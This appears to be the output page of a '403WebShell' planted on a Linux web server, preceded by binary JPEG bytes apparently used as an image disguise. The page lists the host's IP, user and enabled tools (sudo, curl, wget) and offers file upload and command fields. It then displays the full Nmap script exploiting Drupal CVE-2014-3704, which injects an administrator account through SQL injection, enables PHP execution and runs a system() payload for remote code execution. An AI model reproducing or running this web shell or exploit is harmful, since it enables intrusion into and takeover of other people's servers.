JFIFXX    $.' ",#(7),01444'9=82<.342  2!!22222222222222222222222222222222222222222222222222"4 ,PG"Z_4˷kjزZ,F+_z,© zh6٨icfu#ډb_N?wQ5-~I8TK<5oIv-k_U_~bMdӜUHh?]EwQk{_}qFW7HTՑYF?_'ϔ_Ջt=||I 6έ"D/[k9Y8ds|\Ҿp6Ҵ].6znopM[mei$[soᘨ˸ nɜG-ĨUycP3.DBli;hjx7Z^NhN3u{:jx힞#M&jL P@_ P&o89@Sz6t7#Oߋ s}YfTlmrZ)'Nk۞pw\Tȯ?8`Oi{wﭹW[r Q4F׊3m&L=h3z~#\l :F,j@ ʱwQT8"kJO6֚l}R>ډK]y&p}b;N1mr$|7>e@BTM*-iHgD) Em|ؘbҗaҾt4oG*oCNrPQ@z,|?W[0:n,jWiEW$~/hp\?{(0+Y8rΟ+>S-SVN;}s?. w9˟<Mq4Wv'{)01mBVW[8/< %wT^5b)iM pgN&ݝVO~qu9 !J27$O-! :%H ـyΠM=t{!S oK8txA& j0 vF Y|y ~6@c1vOpIg4lODL Rcj_uX63?nkWyf;^*B @~a`Eu+6L.ü>}y}_O6͐:YrGXkGl^w~㒶syIu! W XN7BVO!X2wvGRfT#t/?%8^WaTGcLMI(J1~8?aT ]ASE(*E} 2#I/׍qz^t̔bYz4xt){ OH+(EA&NXTo"XC')}Jzp ~5}^+6wcQ|LpdH}(.|kc4^"Z?ȕ a<L!039C EuCFEwç ;n?*oB8bʝ'#RqfM}7]s2tcS{\icTx;\7KPʇ Z O-~c>"?PEO8@8GQgaՎ󁶠䧘_%#r>1zaebqcPѵn#L =׀t L7`VA{C:ge@w1 Xp3c3ġpM"'-@n4fGB3DJ8[JoߐgK)ƛ$ 83+ 6ʻ SkI*KZlT _`?KQKdB`s}>`*>,*@JdoF*弝O}ks]yߘc1GV<=776qPTtXԀ!9*44Tހ3XΛex46YD  BdemDa\_l,G/֌7Y](xTt^%GE4}bTڹ;Y)BQu>J/J ⮶.XԄjݳ+Ed r5_D1 o Bx΢#<W8R6@gM. drD>(otU@x=~v2 ӣdoBd3eO6㣷ݜ66YQz`S{\P~z m5{J/L1xO\ZFu>ck#&:`$ai>2ΔloF[hlEܺΠk:)` $[69kOw\|8}ބ:񶐕IA1/=2[,!.}gN#ub ~݊}34qdELc$"[qU硬g^%B zrpJru%v\h1Yne`ǥ:gpQM~^Xi `S:V29.PV?Bk AEvw%_9CQwKekPؠ\;Io d{ ߞoc1eP\ `E=@KIRYK2NPlLɀ)&eB+ь( JTx_?EZ }@ 6U뙢طzdWIn` D噥[uV"G&Ú2g}&m?ċ"Om# {ON"SXNeysQ@FnVgdX~nj]J58up~.`r\O,ư0oS _Ml4kv\JSdxSW<AeIX$Iw:Sy›R9Q[,5;@]%u@ *rolbI  +%m:͇ZVủθau,RW33 dJeTYE.Mϧ-oj3+yy^cVO9NV\nd1 !͕_)av;թMlWR1)ElP;yوÏu 3k5Pr6<⒲l!˞*u־n!l:UNW %Chx8vL'X@*)̮ˍ D-M+JUkvK+x8cY?Ԡ~3mo|u@[XeYC\Kpx8oCC&N~3-H MXsu<`~"WL$8ξ3a)|:@m\^`@ҷ)5p+6p%i)P Mngc#0AruzRL+xSS?ʮ}()#tmˇ!0}}y$6Lt;$ʳ{^6{v6ķܰgVcnn ~zx«,2u?cE+ȘH؎%Za)X>uWTzNyosFQƤ$*&LLXL)1" LeOɟ9=:tZcŽY?ӭVwv~,Yrۗ|yGaFC.+ v1fήJ]STBn5sW}y$~z'c 8  ,! pVNSNNqy8z˱A4*'2n<s^ǧ˭PJޮɏUGLJ*#i}K%,)[z21z ?Nin1?TIR#m-1lA`fT5+ܐcq՝ʐ,3f2Uեmab#ŠdQy>\)SLYw#.ʑf ,"+w~N'cO3FN<)j&,- љ֊_zSTǦw>?nU仆Ve0$CdrP m׈eXmVu L.bֹ [Դaզ*\y8Է:Ez\0KqC b̘cөQ=0YsNS.3.Oo:#v7[#߫ 5܎LEr49nCOWlG^0k%;YߝZǓ:S#|}y,/kLd TA(AI$+I3;Y*Z}|ӧOdv..#:nf>>ȶITX 8y"dR|)0=n46ⲑ+ra ~]R̲c?6(q;5% |uj~z8R=XIV=|{vGj\gcqz؋%Mߍ1y#@f^^>N#x#۹6Y~?dfPO{P4Vu1E1J *|%JN`eWuzk M6q t[ gGvWIGu_ft5j"Y:Tɐ*; e54q$C2d} _SL#mYpO.C;cHi#֩%+) ӍƲVSYźg |tj38r|V1#;.SQA[S#`n+$$I P\[@s(EDzP])8G#0B[ىXIIq<9~[Z멜Z⊔IWU&A>P~#dp]9 "cP Md?٥Ifتuk/F9c*9Ǎ:ØFzn*@|Iށ9N3{'['ͬҲ4#}!V Fu,,mTIkv C7vB6kT91*l '~ƞFlU'M ][ΩũJ_{iIn$L jOdxkza۪#EClx˘oVɞljr)/,߬hL#^Lф,íMƁe̩NBLiLq}(q6IçJ$WE$:=#(KBzђ xlx?>Պ+>W,Ly!_DŌlQ![ SJ1ƐY}b,+Loxɓ)=yoh@꥟/Iѭ=Py9 ۍYӘe+pJnϱ?V\SO%(t =?MR[Șd/ nlB7j !;ӥ/[-A>dNsLj ,ɪv=1c.SQO3UƀܽE̻9GϷD7(}Ävӌ\y_0[w <΍>a_[0+LF.޺f>oNTq;y\bՃyjH<|q-eɏ_?_9+PHp$[uxK wMwNی'$Y2=qKBP~Yul:[<F12O5=d]Ysw:ϮEj,_QXz`H1,#II dwrP˂@ZJVy$\y{}^~[:NߌUOdؾe${p>G3cĖlʌ ת[`ϱ-WdgIig2 }s ؤ(%#sS@~3XnRG~\jc3vӍLM[JBTs3}jNʖW;7ç?=XF=-=qߚ#='c7ڑWI(O+=:uxqe2zi+kuGR0&eniT^J~\jyp'dtGsO39* b#Ɋ p[BwsT>d4ۧsnvnU_~,vƜJ1s QIz)(lv8MU=;56Gs#KMP=LvyGd}VwWBF'à ?MHUg2 !p7Qjڴ=ju JnA suMeƆҔ!)'8Ϣٔޝ(Vpצ֖d=ICJǠ{qkԭ߸i@Ku|p=..*+xz[Aqġ#s2aƊRR)*HRsi~a &fMP-KL@ZXy'x{}Zm+:)) IJ-iu ܒH'L(7yGӜq j 6ߌg1go,kرtY?W,pefOQS!K۟cҒA|սj>=⬒˧L[ ߿2JaB~Ru:Q] 0H~]7ƼI(}cq 'ήETq?fabӥvr )o-Q_'ᴎoK;Vo%~OK *bf:-ťIR`B5!RB@ï u ̯e\_U_ gES3QTaxU<~c?*#]MW,[8Oax]1bC|踤Plw5V%){t<d50iXSUm:Z┵i"1^B-PhJ&)O*DcWvM)}Pܗ-q\mmζZ-l@}aE6F@&Sg@ݚM ȹ 4#p\HdYDoH"\..RBHz_/5˘6KhJRPmƶim3,#ccoqa)*PtRmk7xDE\Y閣_X<~)c[[BP6YqS0%_;Àv~| VS؇ 'O0F0\U-d@7SJ*z3nyPOm~P3|Yʉr#CSN@ ƮRN)r"C:: #qbY. 6[2K2uǦHYRQMV G$Q+.>nNHq^ qmMVD+-#*U̒ p욳u:IBmPV@Or[b= 1UE_NmyKbNOU}the`|6֮P>\2PVIDiPO;9rmAHGWS]J*_G+kP2KaZH'KxWMZ%OYDRc+o?qGhmdSoh\D|:WUAQc yTq~^H/#pCZTI1ӏT4"ČZ}`w#*,ʹ 0i課Om*da^gJ݅{le9uF#Tֲ̲ٞC"qߍ ոޑo#XZTp@ o8(jdxw],f`~|,s^f1t|m򸄭/ctr5s79Q4H1꠲BB@l9@C+wpxu£Yc9?`@#omHs2)=2.ljg9$YS%*LRY7Z,*=䷘$armoϰUW.|rufIGwtZwo~5 YյhO+=8fF)W7L9lM̘·Y֘YLf큹pRF99.A "wz=E\Z'a 2Ǚ#;'}G*l^"q+2FQ hjkŦ${ޮ-T٭cf|3#~RJt$b(R(rdx >U b&9,>%E\ Άe$'q't*אެb-|dSBOO$R+H)܎K1m`;J2Y~9Og8=vqD`K[F)k[1m޼cn]skz$@)!I x՝"v9=ZA=`Ɠi :E)`7vI}dYI_ o:obo 3Q&D&2= Ά;>hy.*ⅥSӬ+q&j|UƧ}J0WW< ۋS)jQRjƯrN)Gű4Ѷ(S)Ǣ8iW52No˓ ۍ%5brOnL;n\G=^UdI8$&h'+(cȁ߫klS^cƗjԌEꭔgFȒ@}O*;evWVYJ\]X'5ղkFb 6Ro՜mi Ni>J?lPmU}>_Z&KKqrIDՉ~q3fL:Se>E-G{L6pe,8QIhaXaUA'ʂs+טIjP-y8ۈZ?J$WP Rs]|l(ԓsƊio(S0Y 8T97.WiLc~dxcE|2!XKƘਫ਼$((6~|d9u+qd^389Y6L.I?iIq9)O/뚅OXXVZF[یgQLK1RҖr@v#XlFНyS87kF!AsM^rkpjPDyS$Nqnxҍ!Uf!ehi2m`YI9r6 TFC}/y^Η5d'9A-J>{_l+`A['յϛ#w:݅%X}&PStQ"-\縵/$ƗhXb*yBS;Wջ_mcvt?2}1;qSdd~u:2k52R~z+|HE!)Ǟl7`0<,2*Hl-x^'_TVgZA'j ^2ΪN7t?w x1fIzC-ȖK^q;-WDvT78Z hK(P:Q- 8nZ܃e貾<1YT<,"6{/ ?͟|1:#gW>$dJdB=jf[%rE^il:BxSּ1հ,=*7 fcG#q eh?27,!7x6nLC4x},GeǝtC.vS F43zz\;QYC,6~;RYS/6|25vTimlv& nRh^ejRLGf? ۉҬܦƩ|Ȱ>3!viʯ>vオX3e_1zKȗ\qHS,EW[㺨uch⍸O}a>q6n6N6qN ! 1AQaq0@"2BRb#Pr3C`Scst$4D%Td ?Na3mCwxAmqmm$4n淿t'C"wzU=D\R+wp+YT&պ@ƃ3ޯ?AﶂaŘ@-Q=9Dռѻ@MVP܅G5fY6# ?0UQ,IX(6ڵ[DIMNލc&υj\XR|,4 jThAe^db#$]wOӪ1y%LYm뭛CUƃߜ}Cy1XνmF8jI]HۺиE@Ii;r8ӭVFՇ| &?3|xBMuSGe=Ӕ#BE5GY!z_eqр/W>|-Ci߇t1ޯќdR3ug=0 5[?#͏qcfH{ ?u=??ǯ}ZzhmΔBFTWPxs}G93 )gGR<>r h$'nchPBjJҧH -N1N?~}-q!=_2hcMlvY%UE@|vM2.Y[|y"EïKZF,ɯ?,q?vM 80jx";9vk+ ֧ ȺU?%vcVmA6Qg^MA}3nl QRNl8kkn'(M7m9وq%ޟ*h$Zk"$9: ?U8Sl,,|ɒxH(ѷGn/Q4PG%Ա8N! &7;eKM749R/%lc>x;>C:th?aKXbheᜋ^$Iհ hr7%F$EFdt5+(M6tÜUU|zW=aTsTgdqPQb'm1{|YXNb P~F^F:k6"j! Ir`1&-$Bevk:y#ywI0x=D4tUPZHڠ底taP6b>xaQ# WeFŮNjpJ* mQN*I-*ȩFg3 5Vʊɮa5FO@{NX?H]31Ri_uѕ 0 F~:60p͈SqX#a5>`o&+<2D: ڝ$nP*)N|yEjF5ټeihyZ >kbHavh-#!Po=@k̆IEN@}Ll?jO߭ʞQ|A07xwt!xfI2?Z<ץTcUj]陎Ltl }5ϓ$,Omˊ;@OjEj(ا,LXLOЦ90O .anA7j4 W_ٓzWjcBy՗+EM)dNg6y1_xp$Lv:9"zpʙ$^JԼ*ϭo=xLj6Ju82AH3$ٕ@=Vv]'qEz;I˼)=ɯx /W(Vp$ mu񶤑OqˎTr㠚xsrGCbypG1ߠw e8$⿄/M{*}W]˷.CK\ުx/$WPwr |i&}{X >$-l?-zglΆ(FhvS*b߲ڡn,|)mrH[a3ר[13o_U3TC$(=)0kgP u^=4 WYCҸ:vQרXàtkm,t*^,}D* "(I9R>``[~Q]#afi6l86:,ssN6j"A4IuQ6E,GnHzSHOuk5$I4ؤQ9@CwpBGv[]uOv0I4\yQѸ~>Z8Taqޣ;za/SI:ܫ_|>=Z8:SUIJ"IY8%b8H:QO6;7ISJҌAά3>cE+&jf$eC+z;V rʺmyeaQf&6ND.:NTvm<- uǝ\MvZYNNT-A>jr!SnO 13Ns%3D@`ܟ 1^c< aɽ̲Xë#w|ycW=9I*H8p^(4՗karOcWtO\ƍR8'KIQ?5>[}yUײ -h=% qThG2)"ו3]!kB*pFDlA,eEiHfPs5H:Փ~H0DتDIhF3c2E9H5zԑʚiX=:mxghd(v׊9iSOd@0ڽ:p5h-t&Xqӕ,ie|7A2O%PEhtjY1wЃ!  ࢽMy7\a@ţJ 4ȻF@o̒?4wx)]P~u57X 9^ܩU;Iꭆ 5 eK27({|Y׎ V\"Z1 Z}(Ǝ"1S_vE30>p; ΝD%xW?W?vo^Vidr[/&>~`9Why;R ;;ɮT?r$g1KACcKl:'3 cﳯ*"t8~l)m+U,z`(>yJ?h>]vЍG*{`;y]IT ;cNUfo¾h/$|NS1S"HVT4uhǜ]v;5͠x'C\SBplh}N ABx%ޭl/Twʽ]D=Kžr㻠l4SO?=k M: cCa#ha)ѐxcsgPiG{+xQI= zԫ+ 8"kñj=|c yCF/*9жh{ ?4o kmQNx;Y4膚aw?6>e]Qr:g,i"ԩA*M7qB?ӕFhV25r[7 Y }LR}*sg+xr2U=*'WSZDW]WǞ<叓{$9Ou4y90-1'*D`c^o?(9uݐ'PI& fJݮ:wSjfP1F:X H9dԯ˝[_54 }*;@ܨ ðynT?ןd#4rGͨH1|-#MrS3G3).᧏3vz֑r$G"`j 1tx0<ƆWh6y6,œGagAyb)hDß_mü gG;evݝnQ C-*oyaMI><]obD":GA-\%LT8c)+y76oQ#*{(F⽕y=rW\p۩cA^e6KʐcVf5$'->ՉN"F"UQ@fGb~#&M=8טJNu9D[̤so~ G9TtW^g5y$bY'سǴ=U-2 #MCt(i lj@Q 5̣i*OsxKf}\M{EV{υƇ);HIfeLȣr2>WIȂ6ik 5YOxȺ>Yf5'|H+98pjn.OyjY~iw'l;s2Y:'lgꥴ)o#'SaaKZ m}`169n"xI *+ }FP"l45'ZgE8?[X7(.Q-*ތL@̲v.5[=t\+CNܛ,gSQnH}*FG16&:t4ُ"Ạ$b |#rsaT ]ӽDP7ո0y)e$ٕvIh'QEAm*HRI=: 4牢) %_iNݧl] NtGHL ɱg<1V,J~ٹ"KQ 9HS9?@kr;we݁]I!{ @G["`J:n]{cAEVʆ#U96j#Ym\qe4hB7Cdv\MNgmAyQL4uLjj9#44tl^}LnR!t±]rh6ٍ>yҏNfU  Fm@8}/ujb9he:AyծwGpΧh5l}3p468)Udc;Us/֔YX1O2uqs`hwgr~{ RmhN؎*q 42*th>#E#HvOq}6e\,Wk#Xb>p}դ3T5†6[@Py*n|'f֧>lư΂̺SU'*qp_SM 'c6m ySʨ;MrƋmKxo,GmPAG:iw9}M(^V$ǒѽ9| aJSQarB;}ٻ֢2%Uc#gNaݕ'v[OY'3L3;,p]@S{lsX'cjwk'a.}}& dP*bK=ɍ!;3ngΊUߴmt'*{,=SzfD Ako~Gaoq_mi}#mPXhύmxǍ΂巿zfQc|kc?WY$_Lvl߶c`?ljݲˏ!V6UЂ(A4y)HpZ_x>eR$/`^'3qˏ-&Q=?CFVR DfV9{8gnh(P"6[D< E~0<@`G6Hгcc cK.5DdB`?XQ2ٿyqo&+1^ DW0ꊩG#QnL3c/x 11[yxპCWCcUĨ80me4.{muI=f0QRls9f9~fǨa"@8ȁQ#cicG$Gr/$W(WV"m7[mAmboD j۳ l^kh׽ # iXnveTka^Y4BNĕ0 !01@Q"2AaPq3BR?@4QT3,㺠W[=JKϞ2r^7vc:9 EߴwS#dIxu:Hp9E! V 2;73|F9Y*ʬFDu&y؟^EAA(ɩ^GV:ݜDy`Jr29ܾ㝉[E;FzxYGUeYC v-txIsםĘqEb+P\ :>iC';k|zرny]#ǿbQw(r|ӹs[D2v-%@;8<a[\o[ϧwI!*0krs)[J9^ʜp1) "/_>o<1AEy^C`x1'ܣnps`lfQ):lb>MejH^?kl3(z:1ŠK&?Q~{ٺhy/[V|6}KbXmn[-75q94dmc^h X5G-}دBޟ |rtMV+]c?-#ڛ^ǂ}LkrOu>-Dry D?:ޞUǜ7V?瓮"#rչģVR;n/_ ؉vݶe5db9/O009G5nWJpA*r9>1.[tsFnQ V 77R]ɫ8_0<՜IFu(v4Fk3E)N:yڮeP`1}$WSJSQNjٺ޵#lј(5=5lǏmoWv-1v,Wmn߀$x_DȬ0¤#QR[Vkzmw"9ZG7'[=Qj8R?zf\a=OU*oBA|G254 p.w7  &ξxGHp B%$gtЏ򤵍zHNuЯ-'40;_3 !01"@AQa2Pq#3BR?ʩcaen^8F<7;EA{EÖ1U/#d1an.1ě0ʾRh|RAo3m3 % 28Q yφHTo7lW>#i`qca m,B-j݋'mR1Ήt>Vps0IbIC.1Rea]H64B>o]($Bma!=?B KǾ+Ծ"nK*+[T#{EJSQs5:U\wĐf3܆&)IԆwE TlrTf6Q|Rh:[K zc֧GC%\_a84HcObiؖV7H )*ģK~Xhչ04?0 E<}3#u? |gS6ꊤ|I#Hڛ աwX97Ŀ%SLy6č|Fa 8b$sקhb9RAu7˨pČ_\*w묦F 4D~f|("mNKiS>$d7SlA/²SL|6N}S˯g]6; #. 403WebShell
403Webshell
Server IP : 45.32.152.128  /  Your IP : 216.73.216.105
Web Server : nginx/1.24.0
System : Linux stage-vultr 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User : forge ( 1000)
PHP Version : 8.2.14
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/2271/cwd/usr/share/nmap/scripts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /proc/2271/cwd/usr/share/nmap/scripts/http-vuln-cve2014-3704.nse
local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local table = require "table"
local url = require "url"
local vulns = require "vulns"
local openssl = require "openssl"
local rand = require "rand"

description = [[
Exploits CVE-2014-3704 also known as 'Drupageddon' in Drupal. Versions < 7.32
of Drupal core are known to be affected.

Vulnerability allows remote attackers to conduct SQL injection attacks via an
array containing crafted keys.

The script injects new Drupal administrator user via login form and then it
attempts to log in as this user to determine if target is vulnerable. If that's
the case following exploitation steps are performed:

* PHP filter module which allows embedded PHP code/snippets to be evaluated is enabled,
* permission to use PHP code for administrator users is set,
* new article which contains payload is created & previewed,
* cleanup: by default all DB records that were added/modified by the script are restored.

Vulnerability originally discovered by Stefan Horst from SektionEins.

Exploitation technique used to achieve RCE on the target is based on exploit/multi/http/drupal_drupageddon Metasploit module.
]]

---
-- @see http-sql-injection.nse
--
-- @usage
-- nmap --script http-vuln-cve2014-3704 --script-args http-vuln-cve2014-3704.cmd="uname -a",http-vuln-cve2014-3704.uri="/drupal" <target>
-- nmap --script http-vuln-cve2014-3704 --script-args http-vuln-cve2014-3704.uri="/drupal",http-vuln-cve2014-3704.cleanup=false <target>
--
-- @output
-- PORT   STATE SERVICE REASON
-- 80/tcp open  http    syn-ack
-- | http-vuln-cve2014-3704:
-- |   VULNERABLE:
-- |   Drupal - pre Auth SQL Injection Vulnerability
-- |     State: VULNERABLE (Exploitable)
-- |     IDs:  CVE:CVE-2014-3704
-- |       The expandArguments function in the database abstraction API in
-- |       Drupal core 7.x before 7.32 does not properly construct prepared
-- |       statements, which allows remote attackers to conduct SQL injection
-- |       attacks via an array containing crafted keys.
-- |
-- |     Disclosure date: 2014-10-15
-- |     Exploit results:
-- |       Linux debian 3.2.0-4-amd64 #1 SMP Debian 3.2.51-1 x86_64 GNU/Linux
-- |     References:
-- |       https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html
-- |       https://www.drupal.org/SA-CORE-2014-005
-- |       http://www.securityfocus.com/bid/70595
-- |_      https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3704
--
-- @args http-vuln-cve2014-3704.uri Drupal root directory on the website. Default: /
-- @args http-vuln-cve2014-3704.cmd Shell command to execute. Default: nil
-- @args http-vuln-cve2014-3704.cleanup Indicates whether cleanup (removing DB
--                                      records that was added/modified during
--                                      exploitation phase) will be done.
--                                      Default: true
---

author = "Mariusz Ziulek <mzet()owasp org>"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"vuln", "intrusive", "exploit"}

portrule = shortport.http

--- Appends a new multipart/form-data part to a table
local function multipart_append_data(r, k, data, extra)
  r[#r + 1] = string.format("content-disposition: form-data; name=\"%s\"", k)
  if extra.filename then
    r[#r + 1] = string.format("; filename=\"%s\"", extra.filename)
  end
  if extra.content_type then
    r[#r + 1] = string.format("\r\ncontent-type: %s", extra.content_type)
  end
  if extra.content_transfer_encoding then
    r[#r + 1] = string.format("\r\ncontent-transfer-encoding: %s", extra.content_transfer_encoding)
  end
  r[#r + 1] = string.format("\r\n\r\n%s\r\n", data)
end

--- Creates multipart/form-data message as defined in RFC 2388
local function multipart_build_body(content, boundary)
  local r = {}
  local k, v
  for k, v in pairs(content) do
    r[#r + 1] = string.format("--%s\r\n", boundary)
    if type(v) == "string" then
      multipart_append_data(r, k, v, {})
    elseif type(v) == "table" then
      if v.data == nil then return nil end
      local extra = {
        filename = v.filename or v.name,
        content_type = v.content_type or v.mimetype or "application/octet-stream",
        content_transfer_encoding = v.content_transfer_encoding or "binary",
      }
      multipart_append_data(r, k, v.data, extra)
    else
      return nil
    end
  end

  r[#r + 1] =  string.format("--%s--\r\n", boundary)
  return table.concat(r)
end

local function extract_CSRFtoken(content)
  local pattern = 'name="form_token" value="(.-)"'
  local value = string.match(content, pattern)
  return value
end

local function itoa64(index)
  local itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
  return string.sub(itoa64, index + 1, index + 1)
end

local function phpass_encode64(input)
  local count = #input + 1
  local out = {}
  local cur = 1

  while cur < count do
    local value = string.byte(input, cur)
    cur = cur + 1
    table.insert(out, itoa64(value & 0x3f))

    if cur < count then
      value = value | (string.byte(input, cur) << 8)
    end
    table.insert(out, itoa64((value >> 6) & 0x3f))

    if cur >= count then
      break
    end
    cur = cur + 1

    if cur < count then
      value = value | (string.byte(input, cur) << 16)
    end
    table.insert(out, itoa64((value >> 12) & 0x3f))

    if cur >= count then
      break
    end
    cur = cur + 1

    table.insert(out, itoa64((value >> 18) & 0x3f))
  end

  return table.concat(out)
end

local function gen_passwd_hash(passwd)
  local iter = 15
  local iter_char = itoa64(iter)
  local iter_count = 1<<iter
  local salt = rand.random_alpha(8)

  local md5 = openssl.md5(salt .. passwd)
  for i = 1, iter_count do
    md5 = openssl.md5(md5 .. passwd)
  end

  local dgst = phpass_encode64(md5)
  local h = '$P$' .. iter_char .. salt .. string.sub(dgst, 0, 22)
  return h
end

local function do_sql_query(host, port, uri, user)

  local adminRole = 'administrator'
  local sql_user
  local sql_admin
  local passwd
  local email
  local passHash
  local query

  if user == nil then
    user = rand.random_alpha(10)
    passwd = rand.random_alpha(10)
    passHash = gen_passwd_hash(passwd)
    email = rand.random_alpha(8) .. '@' .. rand.random_alpha(5) .. '.' .. rand.random_alpha(3)

    stdnse.debug(1, string.format("adding admin user (username: '%s'; passwd: '%s')", user, passwd))
    sql_user = url.escape("insert into users (uid,name,pass,mail,status) select max(uid)+1,'" .. user .. "','" .. passHash .. "','" .. email .. "',1 from users;")

    sql_admin = url.escape("insert into users_roles (uid, rid) VALUES ((select uid from users where name='" .. user .. "'), (select rid from role where name = '" .. adminRole .. "'));")

    query = sql_user .. sql_admin
  else
    stdnse.debug(1, string.format("removing admin user (username: '%s')", user))

    sql_user = url.escape("delete from users where name='" .. user .. "';")

    sql_admin = url.escape("delete from users_roles where uid=(select uid from users where name='" .. user .. "');")

    query = sql_admin .. sql_user
  end

  local r = "name[0;" .. query .. "#%20%20]=" .. rand.random_alpha(10) .. "&name[0]=" .. rand.random_alpha(10) .. "&pass=" .. rand.random_alpha(10) .. "&form_id=user_login&op=Log+in"

  local opt = {
    header = {
      ['Content-Type'] = "application/x-www-form-urlencoded"
    }
  }
  local res = http.post(host, port, uri .. "?q=/user/login", opt, nil, r)

  if string.match(res.body, "includes[\\/]database[\\/]database%.inc") and string.match(res.body, "addcslashes%(%)") then
    return user, passwd
  end

end

local function set_php_filter(host, port, uri, session, disable)

  -- enable PHP filter
  if not disable then
    stdnse.debug(1, "enabling PHP filter module")
  else
    stdnse.debug(1, "disabling PHP filter module")
  end

  local opt = {}
  opt['cookies'] = session.name ..'='.. session.value

  local res = http.get(host, port, uri .. "?q=/admin/modules", opt)
  if res == nil then return nil end

  local csrfToken = extract_CSRFtoken(res.body)

  local enabledModulesPattern = 'name="([^"]*)" value="1" checked="checked" class="form%-checkbox"'
  local data = {}
  for m in string.gmatch(res.body, enabledModulesPattern) do
    data[m] = 1
    if disable and m == 'modules[Core][php][enable]' then
      data[m] = nil
    end
  end

  if not disable then
    data['modules[Core][php][enable]'] = 1
  end
  data['form_token'] = csrfToken
  data['form_id'] = 'system_modules'
  data['op'] = 'Save configuration'
  res = http.post(host, port, uri .. "?q=/admin/modules/list/confirm", opt, nil, data)
  if res == nil then return nil end

  return true
end

local function set_permission(host, port, uri, session, disable)

  -- allow Administrator to use php_code
  if not disable then
    stdnse.debug(1, "setting permissions for PHP filter module")
  else
    stdnse.debug(1, "restoring permissions for PHP filter module")
  end

  local opt = {}
  opt['cookies'] = session.name ..'='.. session.value

  local res = http.get(host, port, uri .. "?q=/admin/people/permissions", opt)
  if res == nil then return nil end

  local csrfToken = extract_CSRFtoken(res.body)

  local enabledPermsRegex = 'name="([^"]*)" value="([^"]*)" checked="checked"'
  local data = {}
  for key, value in string.gmatch(res.body, enabledPermsRegex) do
    data[key] = value
    if disable and key == '3[use text format php_code]' then
      data[key] = nil
    end
  end

  if not disable then
    data['3[use text format php_code]'] = 'use text format php_code'
  end
  data['form_token'] = csrfToken
  data['form_id'] = 'user_admin_permissions'
  data['op'] = 'Save permissions'
  res = http.post(host, port, uri .. "?q=/admin/people/permissions", opt, nil, data)
  if res == nil then return nil end

  return true
end

local function trigger_exploit(host, port, uri, session, cmd)

  local opt = {}
  opt['cookies'] = session.name ..'='.. session.value

  -- add new Content page & trigger RCE
  stdnse.debug(1, string.format("%s", "creating new article page with planted payload"))

  local res = http.get(host, port, uri .. "?q=/node/add/article", opt)
  if res == nil then return nil end

  local csrfToken = extract_CSRFtoken(res.body)

  stdnse.debug(1, string.format("%s", "calling preview article page & triggering exploit"))
  local pattern = '"' .. rand.random_alpha(5)
  local payload = "<?php echo '" .. pattern .. " '; system('" .. cmd .. "'); echo '".. pattern .. " '; ?>"
  local boundary = rand.random_alpha(16)
  opt['header'] = {}
  opt['header']["Content-Type"] = "multipart/form-data" .. "; boundary=" .. boundary

  local files = {
    ['title'] = 'title',
    ['form_id'] = 'article_node_form',
    ['form_token'] = csrfToken,
    ['body[und][0][value]'] = payload,
    ['body[und][0][format]'] = 'php_code',
    ['op'] = 'Preview',
  }
  local body = multipart_build_body(files, boundary)

  res = http.post(host, port, uri .. "?q=/node/add/article", opt, nil, body)
  if res == nil then return nil end

  return res.body, pattern
end

action = function(host, port)

  local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or '/'
  local cmd = stdnse.get_script_args(SCRIPT_NAME..".cmd") or nil
  local cleanup = nil
  if stdnse.get_script_args(SCRIPT_NAME..".cleanup") == "false" then
    cleanup = "false"
  end

  local vulnReport = vulns.Report:new(SCRIPT_NAME, host, port)
  local vuln = {
    title = 'Drupal - pre Auth SQL Injection Vulnerability',
    state = vulns.STATE.NOT_VULN,
    description = [[
  The expandArguments function in the database abstraction API in
  Drupal core 7.x before 7.32 does not properly construct prepared
  statements, which allows remote attackers to conduct SQL injection
  attacks via an array containing crafted keys.
    ]],
    IDS = {CVE = 'CVE-2014-3704'},
    references = {
      'https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html',
      'https://www.drupal.org/SA-CORE-2014-005',
      'http://www.securityfocus.com/bid/70595',
    },
    dates = {
      disclosure = {year = '2014', month = '10', day = '15'},
    },
  }

  local user, passwd = do_sql_query(host, port, uri, nil)

  if user == nil or passwd == nil then
    return vulnReport:make_output(vuln)
  end

  stdnse.debug(1, string.format("logging in as admin user (username: '%s'; passwd: '%s')", user, passwd))

  vuln.state = vulns.STATE.EXPLOIT

  local data = {
    ['name'] = user,
    ['pass'] = passwd,
    ['form_id'] = 'user_login',
    ['op'] = 'Log in',
  }

  local res = http.post(host, port, uri .. "?q=/user/login", nil, nil, data)

  if res.status == 302 and res.cookies[1].name ~= nil then

    stdnse.debug(1, string.format("logged in as admin user (username: '%s'; passwd: '%s'). Target is vulnerable.", user, passwd))

    if cmd ~= nil then
      local session = {}
      session.name = res.cookies[1].name
      session.value = res.cookies[1].value

      set_php_filter(host, port, uri, session, false)

      set_permission(host, port, uri, session, false)

      local resp_content, pattern = trigger_exploit(host, port, uri, session, cmd)

      local cmdOut = nil
      for m in string.gmatch(resp_content, pattern .. '([^"]*)' .. pattern) do
        cmdOut = m
        break
      end

      if cmdOut ~= nil then
        vuln.exploit_results = cmdOut
      end

      -- cleanup: restore permission & disable php filter module
      if cleanup == nil then
        set_permission(host, port, uri, session, true)
        set_php_filter(host, port, uri, session, true)
      end
    end

  else
    vuln.state = vulns.STATE.LIKELY_VULN
    vuln.check_results = "Account created but unable to log in."
  end

  -- cleanup: remove admin user
  if cleanup == nil then
    do_sql_query(host, port, uri, user)
  end

  return vulnReport:make_output(vuln)

end

Youez - 2016 - github.com/yon3zu
LinuXploit